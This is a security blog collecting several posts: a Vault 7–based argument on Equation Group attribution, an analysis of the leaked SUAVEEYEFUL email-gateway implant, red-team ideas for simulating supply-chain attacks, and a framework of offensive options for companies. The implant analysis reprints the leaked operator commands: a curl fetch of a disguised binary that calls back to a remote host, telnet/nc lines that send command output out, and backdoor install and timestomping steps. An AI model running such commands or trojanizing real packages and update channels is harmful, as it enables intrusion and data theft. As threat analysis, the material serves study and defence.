xorl %eax, %eax

Why the Equation Group (EQGRP) is NOT the NSA


I covered this topic in my 2021 talk “In nation-state actor’s shoes”, but after my recent blog post I again saw people referring to the EQGRP as the NSA, which is not entirely correct. EQGRP is actually a combination of cyber operators (mostly) from the NSA’s TAO and the CIA’s IOC. So a more accurate statement would be that the EQGRP is the US intelligence community. Here’s why…

WikiLeaks published the Vault 7 leak in 2017. Over the years it has been confirmed to be a real/valid leak, and it provides unprecedented access not only to the CIA tools themselves, but also to the culture and work environment inside the CIA’s cyber component. This is the core source of this blog post.

Brief History of CIA IOC

After the 9/11 terrorist attacks, the CIA took the lead in the counter-terrorism efforts of the US, gaining access to almost unlimited budget, support, and resources to achieve its mission. That also meant the CIA could now expand its domain beyond its area of expertise, Human Intelligence (HUMINT), into other intelligence (and covert action) disciplines, including Signals Intelligence (SIGINT). In other words, develop its own cyber capabilities.

In 2015 the CIA publicly announced a new directorate responsible for improving the Agency’s digital capabilities. This reportedly started from a 2013 initiative by CIA Director Brennan. It was named the Directorate of Digital Innovation (DDI), headed by a Chief Information Officer (CIO), and covered all sorts of topics like modernisation of digital platforms, digitisation of manual processes, developing software for the CIA’s needs, etc. Unsurprisingly, the CIA’s DDI relied extensively on the US intelligence community’s experts to develop those capabilities, and by far the most mature US agency for cyber operations/SIGINT is the Department of Defense’s National Security Agency (NSA).

Inside the DDI, the CIA created the Center for Cyber Intelligence (CCI), which was responsible for intelligence support from the cyber domain. Per the Vault 7 leak, this is where the “hacking division” (as WikiLeaks called it) fell in 2016, when it had over 5,000 registered users responsible for developing, maintaining, enhancing, and using cyber capabilities to support the CIA’s mission. Based on Vault 7, this was the Information Operations Center (IOC). The IOC comprised the cyber operators of the CIA’s CCI, meaning they used the capabilities provided by other departments of the CCI to support the CIA’s intelligence operations from cyberspace.

Based on the leaks we can be certain that CCI was operational (maybe under a different org. structure) years before that 2015 public announcement for DDI, at least since 2008-2009.


One of the largest departments within the CCI was the Engineering Development Group (EDG), responsible for multiple divisions and engineering branches that developed and maintained different cyber capabilities for the IOC operators, the wider US intelligence community, and close allies. For instance, the Applied Engineering Division (AED) included the Embedded Development Branch (EDB), Remote Development Branch (RDB), Operational Support Branch (OSB), etc.

A senior group of EDG employees were members of the EDG’s Technical Advisory Council (TAC) which, as its name implies, was there to review different technical challenges and provide input and expert recommendations.

The TAC Discussion on EQGRP

After Kaspersky’s “Inside the EquationDrug Espionage Platform” was published, the TAC started a discussion to identify the mistakes that led Kaspersky’s GReAT researchers to uncover a vast amount of US cyber capabilities and to associate them all under the EQUATION GROUP (EQGRP) alias. You can read the full thread on WikiLeaks.

From this discussion alone, we can see that:

  • EQGRP was actually a collection of capabilities by mostly NSA’s Tailored Access Operations (TAO) and CIA’s IOC
  • In some cases parts of the same implant were co-authored by CIA and NSA
  • CIA IOC and NSA TAO had different processes (or lack of them) for (re-)using cyber capabilities

And many lessons learned to avoid such a compromise of their capabilities in the future. In general, I highly recommend reading this thread, since it’s a nice retrospective giving a glimpse into a nation-state actor’s reaction when a high-quality threat intelligence report is released.


News outlets, and even some cyber threat intelligence analysts, repeating the narrative that EQGRP is the NSA are almost certainly wrong. Unless Vault 7 was a deception operation (unlikely after all the past years’ research on it), the TAC discussion above makes it very clear that EQGRP was a collection of cyber capabilities used by the cyber operators of the United States, mostly by the NSA’s TAO and the CIA’s IOC.

I know it’s not as sexy saying that the US was behind it as saying NSA TAO was behind it. And indeed, we can make some assumptions: exploits from the early 2000s were most likely from NSA TAO, since the CIA either didn’t have that capability yet or it was still in its early development stages, heavily relying on the NSA’s support; or we could use other means to decouple EQGRP into smaller actors for the CIA, the NSA, and others. However, EQGRP as it’s known today is almost certainly not the NSA alone.

Lastly, any time you talk about nation-state attribution, don’t forget that it’s called the “intelligence community” for a reason. Agencies in an IC share capabilities. Some (like those within the same country) share almost everything, others (like the FIVE EYES) share a lot, and others (like MAXIMATOR) share more specific capabilities and products. Also remember the following (an excerpt from my 2021 talk):

  1. Nation-state actors are just people doing a job with specific objectives and performance goals
  2. It’s hard (usually) to know the intention. This is why geopolitical monitoring matters
  3. Infrastructure of an APT doesn’t mean the same APT executed the operation or that they were interested in you
  4. APT groups do most of their collection in bulk/automated fashion yet almost all research focuses on tailored/targeted access
  5. Attribution is hard… Think critically before you publish

Written by xorl

July 6, 2022 at 18:50

The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP


I was checking the 2017 Shadow Brokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. It was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:

  • SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux
  • SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s
  • The leaked file/operation was targeting MiraPoint email products
  • SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware

The Leaked Files

In that directory there are a few different files. Those are:

  • bdes: A copy of the FreeBSD bdes (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD bdes version (from 22 Sep. 2000), but compiled on Linux in 2003.
  • decode-base64: Simple Perl decoding script using MIME::Base64.
  • implant: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).
  • implant.mg1.waseda.ac.jp: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University’s email gateway (variant of the implant file).
  • opscript.se: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.
  • se: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.
  • se.old: Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.

The utilities (bdes, decode-base64, and uriescape) were bundled along with SUAVEEYEFUL because they are used internally. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like ls, cat, telnet, etc.).

List of the files leaked by the Shadow Brokers under the suaveeyeful_i386-unknown-mirapoint3.4.3 directory


The se.old client was potentially the one the operators were adapting for their new target; inconsistencies in its content make it look like a draft/edited version of an old operation. A leftover comment identifies mail.mfa.gov.cn ( as its configured SUAVEEYEFUL target.

This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even today, this IP address ( still points to an email server of China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant; based entirely on the build times, we can assess that it was at least since the early 2000s.

The current website hosted on mail.mfa.gov.cn

Most of the files included in the leaked directory were designed for another target: the email gateways of the Waseda Research University, which according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”

The se client had two compromised Waseda email gateways configured, both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least three systems in Waseda’s infrastructure had been compromised by the EQUATION GROUP since at least 2003.

  • mp450 (
  • mg1.waseda.ac.jp (
  • – another compromised host

The first host (mp450) was the university’s MiraPoint 450 (later renamed RazorGate 450), an email security appliance, and the second (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.

Simplified visualisation of the SUAVEEYEFUL installation process

Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers

This is clearly described in the opscript.se file, which we can assume was one of the first operational tasks the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is the process:

  1. Copy the implant to the /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi file
  2. Change nph-help.cgi's file permissions to 555
  3. Change nph-help.cgi's ownership to "root" with group "nobody"
  4. Use touch -r to give nph-help.cgi, as well as everything under the /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/ directory, the same timestamps as the legitimate /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html MiraPoint web page
  5. Use netcat to start a listener on port 4444, decoding the received data with Base64 and decrypting it using bdes with a hardcoded key (0x4790cae5ec154ccc in this case)
  6. Connect back from mp450's SUAVEEYEFUL implant to the listening port 4444 and provide some basic system information (who is logged in, list of files/directories, etc.)
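For illustration, the first four steps can be replayed in a scratch directory (a sketch only: the real paths were under /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/, the files here are stand-ins, and the chown root:nobody step is skipped since it requires root):

```shell
# Sketch of the opscript.se install steps, replayed in a scratch
# directory instead of the real MiraPoint paths (GNU coreutils assumed).
UTILDIR=$(mktemp -d)/utilities
mkdir -p "$UTILDIR"
echo 'fake implant' > implant.bin                 # stand-in for the implant ELF
echo 'legit page'   > "$UTILDIR/publish.html"     # stand-in legitimate file
touch -t 200301011200 "$UTILDIR/publish.html"     # give it an old timestamp

cp implant.bin "$UTILDIR/nph-help.cgi"            # step 1: stage as a help CGI
chmod 555 "$UTILDIR/nph-help.cgi"                 # step 2: permissions 555
# step 3: chown root:nobody "$UTILDIR/nph-help.cgi"  (requires root, skipped)
touch -r "$UTILDIR/publish.html" \
         "$UTILDIR/nph-help.cgi" "$UTILDIR"       # step 4: timestomp everything
ls -l "$UTILDIR"
```

The timestomping in step 4 is what made the implant blend in with the legitimate MiraPoint help files on casual inspection.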

The SUAVEEYEFUL Software Implant

SUAVEEYEFUL (or SE) has two components: a client and a server. The server component is a very simple CGI program written in C for FreeBSD that looks for input at its help endpoint. Any commands received would be executed (with root privileges, as shown in the previous section) using the system() library call, as long as they match the defined format (described later in this post).

The client side ensures that all requests are properly formatted, encoded (using Base64), and encrypted (with DES). The client supported four options:

  • -h: Display help message
  • -c: Execute command
  • -i: Input target (e.g. the URL of a host running the SE server component)
  • -k: Key used for DES encryption
Screenshot of the se client used to target the Waseda University

As we can see, for the generation of the cryptographic material the EQUATION GROUP used the system’s /dev/random in the following way:

head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

The command was then structured with # used as a field separator. The main command to be executed was constructed with this:

echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out

This results in messages of the form:

<random-nonce>#<unix-timestamp>#<command>

This structure was then encrypted using the hardcoded DES key and passed through the uriescape tool to ensure there would be no parsing issues on the receiving MiraPoint web server.
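Minus the DES and URL-escaping stages (bdes and uriescape don’t ship on modern systems), the client-side message construction can be sketched as follows; note that /dev/urandom stands in for the original’s /dev/random:

```shell
# Build an SE command message: <nonce>#<unix-timestamp>#<command>,
# using '#' as the field separator exactly like the leaked client.
# (The bdes encryption and uriescape stages are omitted here.)
cmd="w; ls -l"
nonce=$(head -c 8 /dev/urandom | hexdump -e '/8 "%016x\n"')
msg="${nonce}#$(date +%s)#${cmd}"
echo "$msg"
```

The timestamp field gives the server a cheap replay/format check before anything reaches system().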

Apart from the above, the client also used the date +"%N" command to get the current time in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick, since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.

The generation of the three values and sending the full command message to the compromised system running the SUAVEEYEFUL software implant server component

Lastly, the SE help message displayed three example commands that the operator could use. The three help commands performed the following tasks:

  1. Install a fileless malware by doing the following:
    • Create a hidden directory (/tmp/.scsi)
    • Use curl to download a binary deceptively named sendmail from the operational host (
    • Run sendmail as root, connecting back to the operational host on a different port (
    • Remove the sendmail binary file so that it runs only in memory, not from the filesystem
  2. Execute commands with a connect-back method:
    • Run w followed by ls -l and ls -l /tmp to get the logged-in users and the contents of the current and /tmp directories
    • Encrypt and encode the output
    • Send it to the operational host on its listening port (
    • The message also guides the operator on how to generate a new DES encryption key
  3. Same as #2 but without the Base64 encoding and DES encryption

Here is the full help message:

1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 

2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET

Use this to generate a random key and replace SECRET with the key
  head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

3) se -c"(w; ls -l; ls -l /tmp) | telnet 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444


DO NOT -burn!!!
Use -exit

Written by xorl

June 22, 2022 at 10:19

Ideas for Software Supply-Chain Attacks Simulation by Red Teams


The purpose of red teams is to simulate real adversaries in order to test both the technical security controls and the non-technical ones (e.g. response procedures, DFIR playbooks, and so on) of an organisation. Four years ago I posted a proposal on how red teams could/should deploy multi-stage C2 infrastructures. Now I’ll highlight another increasing threat for most companies.

Whether it comes from nation-state actors, compromised shared libraries, hacktivists, or anything else in between, software supply-chain intrusions are getting a lot of attention. So, if you are a red teamer and you’re looking for ideas on how to simulate those, here are a couple of ideas.

Why bother? Well, to provide more value to your customers through a practical assessment of whether they can effectively protect against (or at least detect) supply-chain threats.

Internal Code Repositories

Assuming you got access to an endpoint of a developer, administrator, engineer, etc., modify code or configurations in internal code repositories in order to propagate to more systems/networks. For instance, check whether your “user” can access Git repositories, CI/CD pipelines, configuration management (SaltStack, Ansible, Terraform, Puppet, CFEngine, JAMF, Rudder, Chef, SCCM, etc.), cloud deployment tools, container images, etc., and try to push implants or expand access via those means.
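As a hypothetical first reconnaissance step, that check could be sketched like this (the function name, search depth, and file names are illustrative assumptions, not a known tool):

```shell
# List checked-out repositories and CI/CD or config-management files
# readable by the current user -- candidate spots to seed an implant.
# Search depth and file names are illustrative; extend per environment.
list_supply_chain_targets() {
    find "$1" -maxdepth 4 \
        \( -name .git -o -name .gitlab-ci.yml -o -name Jenkinsfile \
           -o -name '*.tf' -o -name Dockerfile \) \
        2>/dev/null || true
}

list_supply_chain_targets "$HOME"
```

Anything this turns up is a place where a commit or pipeline change made by the compromised “user” could propagate downstream.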

Waterhole-enabled Supply Chain

At some point it is almost certain that you’ll obtain access to something beyond an endpoint. It could be a fileserver, an internal web application server, a cloud/3rd-party service, a container running some small service, or anything else. Instead of trying to pivot via “traditional means”, why not modify the service offered by this system to push out an implant, or take an action against anyone that uses it, to increase your access?

In-house Packages/Software

You might stumble across some (open source or proprietary) software that is either mirrored internally in some repositories or customised for whatever business reason and hosted on something like a fileserver, a package repository, or something along those lines. Here you could try to trojanize it and wait for it to propagate.

Software Update Solutions

It’s not uncommon for organisations to have automated or semi-automated solutions for performing software updates. If you can modify those updates to include an implant, you can very effectively emulate a supply-chain propagation. Hint: some of those systems rely on inherently insecure protocols (e.g. FTP, TFTP, SMTP, HTTP, etc.), so you could even hijack/MiTM/trojanize them at the network level if you have access to the links they pass over.
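On a Debian/Ubuntu host, for example, the check for cleartext update channels could be sketched like this (the paths are distro-specific assumptions; other update mechanisms will keep their configuration elsewhere):

```shell
# Print package sources fetched over cleartext HTTP/FTP -- candidates
# for network-level hijacking/MiTM. Debian/Ubuntu apt paths assumed;
# adjust for other distributions or update mechanisms.
check_cleartext_sources() {
    grep -rhoE '(http|ftp)://[^ ]+' "$@" 2>/dev/null || true
}

check_cleartext_sources /etc/apt/sources.list /etc/apt/sources.list.d
```

Any URL this prints is an update channel that could, in principle, be tampered with on the wire.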

Fleet Management

Similarly to the previous one, even small organisations rely on one (or more) fleet management solutions, and if you manage to get access there it’s, more or less, the same as having a nice C2 preconfigured for you. So, why not use that to expand your access?

Pre-agreed Access

It is possible that as part of your Statement of Work (SoW) you will be given some limited access. If you aim to evaluate the supply-chain defences of the organisation, you could ask for access to some internal application or, even better, a 3rd-party system/application/service the organisation relies on, and use that as your starting point. Meaning, the engagement starts under the assumption that this 3rd party is compromised.

I’m pretty sure there are tons more concepts that a red team could take advantage of depending on the organisation they target. But hopefully the above gives you some ideas on how to evaluate supply-chain threats in a relatively controlled but realistic manner.

Written by xorl

April 7, 2022 at 15:21


Guide on Offensive Operations for Companies


I’ve been thinking of writing this post for some time, and I decided to finally do it. Everything written here depends heavily on what you are legally allowed to do, which in turn depends on the country of your legal entity/company, regional laws and regulations, international laws affecting you, as well as the business itself (for instance, a cyber-security firm would have far more freedom than a retail business). This is why, if you decide to move into offensive operations against your adversaries, you MUST first check your objectives with your legal advisor and get their sign-off.

That being said, there are many levels between doing nothing and hacking back an adversary. Some are pretty common, and others are only employed by nation-state actors. To simplify the structure, I created a diagram that tries to put them into a framework that will help you decide which offensive operations you are legally allowed and technically capable of performing. Feel free to use this as a starting guide if you aren’t sure where to start, but do not limit yourself to what’s mentioned there; develop it further based on your needs and capabilities. Under the diagram you’ll find a brief explanation of what each mentioned name means.

Starting from low complexity and low business risk and moving up, we have:

  • Local Deception Operations: All the cyber deception that can be implemented internally in a company’s environment such as honeytokens, honeypots, honey networks, canary tokens, deception/fake networks, etc. in order to lure the adversary into a highly controlled environment and monitor their activities, and/or to quickly detect and deny/disrupt their operation.
    • Offensive action: Tricking the adversary into actions that will give you the detection and response tactical advantage.
    • Complexity: Low/medium
    • Business risk: Minor (due to keeping all those deception operations confidential which could result in a negative impact/perception by employees, as well as complex processes within the security team(s))
  • Infrastructure Takedowns: That is reporting and requesting takedowns of malicious infrastructure through either service providers or directly via the hosting companies. This includes things like request takedown of phishing domains, malware hosting servers, email accounts, etc.
    • Offensive action: Depending on the takedown, this could be a degradation, denial, disruption, or destruction operation against an adversary’s infrastructure, imposing on them the cost of reestablishing it.
    • Complexity: Low/medium
    • Business risk: Medium. Process needs to be well-defined to avoid any issues such as requesting takedowns of legitimate infrastructure, having legal issues from the affected companies, avoid leaking sensitive information on the takedown requests, etc.
  • Indirect Public Disclosure: Several threat intelligence vendors and national CERTs allow for anonymized reporting/public disclosure of intelligence reports. This capability allows a company to publicly disclose details that would otherwise have the risks of the “Public Disclosure” operations mentioned later.
    • Offensive action: Forcing the adversaries to change their TTPs (thus inducing cost and delays to their operations), making it globally known what the adversary does and how, which could enable nation-state actors or other companies to use this public material as supportive evidence in more aggressive offensive actions.
    • Complexity: Low
    • Business risk: Minor when the anonymization is done carefully.
  • Active Darkweb Monitoring: By that term I mean any sort of operation to obtain access to and monitor your adversaries’ communication channels (e.g. Telegram groups, darkweb forums, etc.) so that you learn as early as possible of any offensive actions targeting your business and can take appropriate measures. Most companies typically implement this via threat intelligence vendor(s).
    • Offensive action: Infiltrating into the adversaries’ communication platforms and collecting intelligence on their activities.
    • Complexity: Low/medium
    • Business risk: Minor when done via a vendor. Medium when developed in-house as it requires high discipline, processes, OPSEC measures, legal and privacy sign-offs, etc.
  • Collaboration with Authorities: That is proactively reaching out to law enforcement and/or intelligence agencies related to cyber operations to help them in an operation against a specific adversary. For instance, providing them with evidence, information only your company has, etc.
    • Offensive action: Potential for nation-state action against your adversary(-ies) such as prosecution, diplomatic/external actions, sanctions, covert actions, etc.
    • Complexity: Medium
    • Business risk: This imposes a noticeable risk of the business being affiliated with a specific government and/or political party, getting accidentally involved in unrelated government issues, becoming an “agent” of the authorities you worked with, or being seen as a nation-state proxy by other countries/governments.
  • Legal Actions: This involves any sort of legal action your company might take against an adversary, such as cease and desist letters, seizure of malicious infrastructure, criminal complaints against specific adversaries, sanctions, etc.
    • Offensive action: Active and overt approaches to disrupt and destroy adversarial activities through legal means.
    • Complexity: Medium/high
    • Business risk: Medium/high. This will require experienced investigators, digital forensics experts with practical legal/prosecution experience, processes for building a criminal case and managing the evidence, experienced legal resources, appetite for public exposure, and of course, acceptance that now your adversaries know what you know, and there is always a chance that you might lose the case when it gets to the court.
  • Public Disclosure: This is a foreign policy tool of many nation-states which can also be employed by private companies. By making the entire world aware of who targeted you (especially when it is a nation-state actor), you give ammunition to any other nation-state to use this information against your adversaries, without your direct involvement.
    • Offensive action: Revealing an operation that was aiming on being covert, causing the adversaries to change their tactics, and giving their adversaries the opportunity to use this disclosed material against them.
    • Complexity: Medium/high
    • Business risk: Medium/high. This disclosure might bring a lot of negative press, and will also reveal what you know. This means that those adversaries are likely to use more advanced techniques the next time they’ll go after your company. Furthermore, nation-states might request your support in legal actions. For a less risky approach, check the “Indirect Public Disclosure” operations.
  • Remote Passive SIGINT (Signals Intelligence): This means obtaining signals (typically raw network traffic or raw communications) by third parties such as data brokers or threat intelligence vendors, which can help you proactively discover adversarial activities.
    • Offensive action: Inspecting data collected outside your organization to proactively discover and deny any adversarial activity against your company.
    • Complexity: Medium
    • Business risk: Minor. The only risk is to make sure you do not use any illegal or shady services, and instead rely on industry standards and well-known vendors.
  • Remote Deception Operations: Such operations include the creation of fake profiles of your company, fake publicly exposed services, fake leaked documents with tracking tokens, etc. This is a lighter version of the “Sting Operations” discussed later.
    • Offensive action: Hunt adversaries by luring them with fake targets so that you can catch them before they target the real assets of the company.
    • Complexity: Medium
    • Business risk: Minor. Mostly around having strong processes to avoid security mistakes that would jeopardise your security posture, keeping those operations well-managed, and operating on a need-to-know basis.
  • Data Breach Data Exploitation: This means getting access to data from data breaches and using them to uncover adversarial activities or intelligence which will help you proactively protect your company. Examples include proactively discovering infrastructure used for malicious purposes, accounts used by adversaries, deanonymization, etc.
    • Offensive action: Exploiting data which would otherwise be confidential to the organization that had them, in order to get more insights on your adversaries.
    • Complexity: Medium
    • Business risk: Medium. There is a lot of legal and ethical debate over the data breach data exploitation and that could have some business impact for a company. Additionally, the handling of such data involves some complexity in terms of access management, auditability of who did what and why, retention policies, etc. which means additional resources, technology, and processes will likely be needed.
  • False Flag Operations: An advanced offensive technique to trick your adversaries into a thought process to take advantage over their actions. For instance, make it look like a rival adversary leaked information about them, or have them believe that a rival adversary has already compromised the systems they are in.
    • Offensive action: Dynamically and actively change your adversaries’ TTPs by forcing them into believing that something other than what they see is happening.
    • Complexity: Medium/high
    • Business risk: Medium/high. Those operations need very careful planning, discipline and could easily backfire in a variety of different ways including negative media attention, making your adversaries switch to more advanced techniques, legal actions from government bodies that you might have interfered with their operations, having the opposite effect, etc.
  • CNA Operations: Computer Network Attack (CNA) operations are any activities that will cause degradation, disruption, or destruction of the adversaries’ infrastructure and resources. Examples include denial-of-service attacks, seizure of their resources, flooding their resources (e.g. mass mailers, automated calls, etc.), making countless fake accounts on their platforms, spam, feeding them fake data, etc.
    • Offensive action: Causing the adversaries to focus their efforts on responding to the CNA operation instead of performing their intended malicious activity.
    • Complexity: High
    • Business risk: High. This is a very grey area which might get the company treated as a criminal entity. There needs to be very thorough legal and business alignment on how, why, who, when, and where those activities will happen, and in most cases it is (legally) impossible for most companies to perform such operations.
  • Sting Operations: Here the defenders could try to pose as criminals to infiltrate a group, or set up a fake website to recruit cyber-criminals, and other similar operations with the end goal to infiltrate the adversary’s entities.
    • Offensive action: Proactively identifying adversarial plans and denying them by applying the appropriate security controls.
    • Complexity: High
    • Business risk: High. For the vast majority of companies out there, it would be impossible to legally do this. However, some might be able to pull this off in collaboration with the authorities. The risk is high and on multiple levels, from public relations, to impacting law enforcement operations, to privacy and legal issues, etc.
  • Takeover: In takeover operations the private company uses its knowledge and resources to take control of infrastructure operated by the adversary. This will not only impose costs on the adversaries for new infrastructure, but it can also reveal details of their TTPs, identifiable information connecting them to their real identities, and so on.
    • Offensive action: Denying access to the adversaries, disrupting or degrading their operations, and collecting a significant part of their digital capabilities and information.
    • Complexity: High
    • Business risk: High. Back in the day, those were a common occurrence but as cyber is becoming more and more of a regulated and controlled space, conducting a takeover could result in very serious legal and PR implications for a business. Nowadays, those are typically limited to specific companies operating in this space and government entities. They can still be performed by others, but it is a complex process with many moving parts.
  • Online HUMINT (Human Intelligence): The purpose of those operations is both to understand and infiltrate adversarial groups/networks by exploiting human weaknesses (e.g. social engineering, recruiting insiders, etc.), and to disrupt their operations from the inside. For example, recruit (or become) an influential member and create tensions in the group, steer the group’s focus from operations to internal conflicts, create division among members, etc.
    • Offensive action: Depending on the level it could be anything from collecting intelligence on the TTPs of the adversary to proactively protect your assets, all the way to creating internal conflicts that will result in disrupting or destroying a group entirely. In some cases, those tensions could go as far as members reporting each other to the authorities.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It is not unheard of for a private company to support them, but the risk is quite high due to the potential impact on the business from both the adversaries and the involved authorities.
  • 3rd/4th Party Collection: In simple terms this can be considered a step up from the “Takeover” operations discussed earlier. Here the operation doesn’t stop at taking over the adversary’s infrastructure; it uses that infrastructure to collect data from wherever it has access. For example, you might have taken over a Command & Control server and found on it VPN credentials for another server the threat actors use. You use them to access that server and collect intelligence and/or disrupt their operations. This can extend multiple levels into the other side too. For instance, use the C&C to send commands to the infected hosts (if an adversary system is among them) and collect data (or perform other actions) there as well.
    • Offensive action: Exploitation of adversarial infrastructure at multiple levels, masking your activities behind the taken-over system(s). This could be used for anything from intelligence collection to disruption, degradation, denial, etc.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It would be very complex and risky for any private company to attempt this since it involves breaking into systems at multiple levels.
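Because collection here happens several hops away from your own sensors, tracking provenance per item matters for assessing reliability. A minimal sketch (the tier labels, hostname, and file name are illustrative, not a real taxonomy) of tagging each collected item with how many hops from your own collection it originated:

```python
from dataclasses import dataclass

# Illustrative tier labels; "3rd/4th party" here follows the common usage
# of riding on someone else's access rather than your own sensors.
TIERS = {
    1: "own sensors",
    2: "partner sharing",
    3: "taken-over adversary infrastructure",
    4: "hosts reached through that infrastructure",
}

@dataclass
class CollectedItem:
    source_host: str   # where the data was physically collected
    tier: int          # collection tier from the TIERS table above
    item: str          # e.g. a file name, credential, or log extract

    def provenance(self) -> str:
        return f"{self.item} from {self.source_host} ({TIERS[self.tier]})"

# Hypothetical example: a VPN config found on a taken-over C&C server.
vpn_cfg = CollectedItem("c2.example.net", 3, "vpn_config.ovpn")
print(vpn_cfg.provenance())
# vpn_config.ovpn from c2.example.net (taken-over adversary infrastructure)
```

Keeping the tier attached to every artefact lets analysts weight intelligence appropriately as the chain of access gets longer.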
  • CNE Operations: This is the research to identify and exploit vulnerabilities in order to execute a Computer Network Exploitation (CNE) operation against an adversary. For instance, find a software vulnerability in their malware that allows you to take over their C&C, or identify a misconfiguration on their operational hosts that allows you to infiltrate them, etc. This is what is commonly known as hacking back.
    • Offensive action: Exploitation of adversarial infrastructure. This could be used for anything from intelligence collection to disruption, degradation, denial, etc.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It would be complex and risky for any private company to try to conduct this since it involves breaking into systems.
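The reconnaissance half of this, spotting an exposed or misconfigured adversary panel, can be sketched as a simple fingerprint check. The signature strings below are hypothetical placeholders, not real indicators; in practice they would come from your own vulnerability research:

```python
# Hypothetical signatures; real C&C panels and their weaknesses vary, so
# these markers stand in for whatever your research actually identifies.
SIGNATURES = {
    "open_directory": "Index of /",                        # directory listing exposed
    "debug_traceback": "Traceback (most recent call last)",  # debug mode left on
    "default_banner": "BotPanel login",                    # hypothetical default page
}

def fingerprint(body: str) -> list:
    """Return the names of known weaknesses a fetched page body exhibits."""
    return [name for name, marker in SIGNATURES.items() if marker in body]

print(fingerprint("<title>Index of /</title><a href='gate.php'>"))  # ['open_directory']
print(fingerprint("nothing interesting here"))                      # []
```

A match is only the starting point; whether and how to act on it is exactly the legal and business question raised above.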
  • Automated CNE: This scales up “CNE Operations” by automating the exploitation step. That is, developing the ability not only to take advantage of the identified vulnerabilities in adversarial infrastructure, but to automatically (or on demand via automation) exploit all existing and newly deployed adversarial infrastructure with no (or minimal) human interaction.
    • Offensive action: Exploitation of adversarial infrastructure. This could be used for anything from intelligence collection to disruption, degradation, denial, etc.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It would be complex and risky for any private company to try to conduct this since it involves breaking into systems.
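The scaling step above can be sketched as a triage loop over a feed of newly observed adversary hosts. Everything here is hypothetical (the “BotPanel/2.1” banner, the host feed, the scanner lookup), and a real pipeline would keep a human approval step before any action is taken:

```python
from queue import Queue

# Hypothetical fingerprint: a panel version with a publicly known flaw.
KNOWN_WEAK_BANNER = "BotPanel/2.1"

def triage(new_hosts, banners):
    """Queue newly observed adversary hosts whose service banner matches a
    known-vulnerable fingerprint. `banners` stands in for a scanner feed."""
    actions = Queue()
    for host in new_hosts:
        if banners.get(host, "").startswith(KNOWN_WEAK_BANNER):
            actions.put(host)  # candidate for (human-approved) exploitation
    return actions

feed = ["198.51.100.7", "203.0.113.4"]
banners = {"198.51.100.7": "BotPanel/2.1 (php)", "203.0.113.4": "nginx/1.18"}
pending = triage(feed, banners)
print(pending.get())  # 198.51.100.7
```

The automation is in the matching and queueing; the hard part, and the entire risk discussion above, is what happens to the queue afterwards.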

Written by xorl

December 28, 2021 at 15:28

Posted in security

Predict 21: Tradecraft Tips for Unusual Recorded Future Uses


Since its first instance (known as RFUN back then), Recorded Future’s intelligence summits have been one of my favourite industry events. That’s not only due to the content, which is always incredible and covers multiple aspects of the intelligence world, but also the overall atmosphere of the event. The attention to detail and passion of the organizers is apparent if you have ever had the opportunity to attend either RFUN or its successor, Predict.

In 2019, together with an amazing colleague, I had the honour of recording a podcast for RFUN while attending the event. But this year I was even more excited, since a talk I had submitted was accepted, marking my first speaking engagement at Predict. My talk was titled “Tradecraft Tips for Unusual Recorded Future Uses” and was about, more or less, what the title says.

That is, tradecraft tips on how you can use Recorded Future’s platform for things that aren’t common knowledge. For example, taking advantage of the platform’s OCR capabilities, crisis monitoring, how to take advantage (“exploit” in intelligence lingo) of “noisy” sources, threat actor tracking and alerting, enriching the platform by onboarding new sources, etc.

